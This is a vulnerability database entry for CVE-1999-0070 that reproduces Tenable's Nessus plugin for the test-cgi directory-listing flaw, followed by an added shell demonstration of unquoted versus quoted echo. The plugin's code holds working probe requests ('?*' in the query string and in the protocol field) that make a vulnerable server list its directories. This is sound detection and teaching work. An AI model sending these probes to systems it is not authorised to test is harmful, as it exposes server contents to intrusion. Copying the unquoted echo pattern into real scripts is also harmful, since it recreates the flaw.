Multiple Vendor test-cgi Arbitrary File Access

Published: 22 Jun 1999 00:00:00
Reported by: Tenable
Type: nessus
Source: www.tenable.com

The remote web server has a vulnerable test-cgi script that allows unauthorized directory access.

Related

| Reporter | Title | Published | Family |
| Check Point Advisories | Test-Cgi Remote Command Execution (CVE-1999-0070) | 11 Sep 1999 00:00 | checkpoint_advisories |
| CVE | CVE-1999-0070 | 29 Sep 1999 04:00 | cve |
| Cvelist | CVE-1999-0070 | 29 Sep 1999 04:00 | cvelist |
| NVD | CVE-1999-0070 | 1 Apr 1996 05:00 | nvd |
| RedhatCVE | CVE-1999-0070 | 7 Jan 2026 09:43 | redhatcve |

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(10282);
  script_version("1.39");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-1999-0070");
  script_bugtraq_id(2003);

  script_name(english:"Multiple Vendor test-cgi Arbitrary File Access");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is affected by
information disclosure vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote web server contains the 'test-cgi' test script, which is
included by default with some web servers. 

The version of this script on the remote host fails to quote input to
several environment variables, such as 'QUERY_STRING', before echoing
it back as part of a shell script.  An unauthenticated attacker can
leverage this issue to list the contents of directories on the remote
host, subject to the permissions of the web server user id.");
  script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/582");
  script_set_attribute(attribute:"solution", value:
"Disable or delete the CGI script.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"1996/04/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 1999-2022 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

cgi = "test-cgi";
pat = string("[= ]", cgi, "($| )");


foreach dir (cgi_dirs())
{
  url = string(dir, "/", cgi);

  # Try an exploit using QUERY_STRING.
  info = "";

  exploit = strcat('GET ', url, '?* HTTP/1.0\r\n\r\n');
  w = http_send_recv_buf(port: port, data: exploit);
  if (isnull(w)) exit(1, "the web server did not answer");
  res = strcat(w[0], w[1], '\r\n', w[2]);

  lines = egrep(pattern:"^QUERY_STRING *= *", string:res);
  if (lines)
  {
    foreach line (split(lines, keep:FALSE))
    {
      # There's a problem if we see the script name in the line; eg,
      #   QUERY_STRING = nph-test-cgi printenv test-cgi
      if (ereg(string:line, pattern:pat))
      {
        info = line;
        break;
      }
    }
  }

  # If the exploit didn't work but the script appears to exist...
  if (lines && !info && thorough_tests)
  {
    # Try an exploit using SERVER_PROTOCOL.
    exploit = strcat('GET ', url, '?x HTTP/1.0 *\r\n\r\n');
    w = http_send_recv_buf(port: port, data: exploit);
    if (isnull(w)) exit(1, "the web server did not answer");
    res = strcat(w[0], w[1], '\r\n', w[2]);

    lines = egrep(pattern:"^SERVER_PROTOCOL *= *", string:res);
    if (lines)
    {
      foreach line (split(lines, keep:FALSE))
      {
        # There's a problem if we see the script name in the line; eg,
        #   SERVER_PROTOCOL = HTTP/1.0 nph-test-cgi printenv test-cgi
        if (ereg(string:line, pattern:pat))
        {
          info = line;
          break;
        }
      }
    }
  }

  if (info)
  {
    if (report_verbosity)
    {
      info = strstr(info, "=") - "=";
      while (info[0] == " ") info = substr(info, 1);
      if ("HTTP/" >< info) info = ereg_replace(pattern:"^HTTP/[0-9]\.[0-9] +", replace:"", string:info);
      info = str_replace(find:" ", replace:'\n  ', string:info);

      report = string(
        "\n",
        "Here are the contents of the CGI directory '", dir, "' on the\n",
        "remote host :\n",
        "\n",
        "  ", info, "\n",
        "\n",
        "which Nessus collected by sending the following request :\n",
        "\n",
        "  ", exploit, "\n"
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);
    exit(0);
  }
}
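
Added example (not part of the Tenable plugin or of any vendor's test-cgi script): a shell model of the quoting flaw the plugin description names, with the unquoted echo beside a quoted one. The function names and the scratch-directory file names are constructed for illustration; the grep pattern is the plugin's own `pat`.

```shell
#!/bin/sh
# Added illustration; function and file names are constructed, not from test-cgi.

# Flawed form: $QUERY_STRING is expanded unquoted, so the shell applies
# word splitting and pathname expansion (globbing) before echo runs.
render_unquoted() {
    QUERY_STRING=$1
    echo QUERY_STRING = $QUERY_STRING
}

# Corrected form: double quotes keep the value literal.
render_quoted() {
    QUERY_STRING=$1
    printf '%s\n' "QUERY_STRING = $QUERY_STRING"
}

# Run a renderer inside a scratch directory whose constructed file names
# stand in for the contents of a CGI directory.
demo() {
    sandbox=$(mktemp -d) || return 1
    status=0
    (cd "$sandbox" && touch nph-test-cgi printenv test-cgi && "$1" "$2") || status=$?
    rm -rf "$sandbox"
    return "$status"
}

# Same heuristic as the plugin's `pat`: the script's own file name showing up
# as a separate word in the echoed line means a directory listing leaked.
leaks_listing() {
    printf '%s\n' "$1" | grep -Eq '[= ]test-cgi($| )'
}

for renderer in render_unquoted render_quoted; do
    line=$(demo "$renderer" '*')
    if leaks_listing "$line"; then verdict="listing leaked"; else verdict="literal value"; fi
    printf '%-16s -> %s (%s)\n' "$renderer" "$line" "$verdict"
done
```

The same check can be used after applying a vendor fix: a script that echoes the literal value no longer matches the pattern, which is the condition under which the plugin stays silent.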

11 Apr 2022 00:00 (Current)
Vulners AI Score: 5.6 (Medium risk)
CVSS 2: 5
EPSS: 0.85207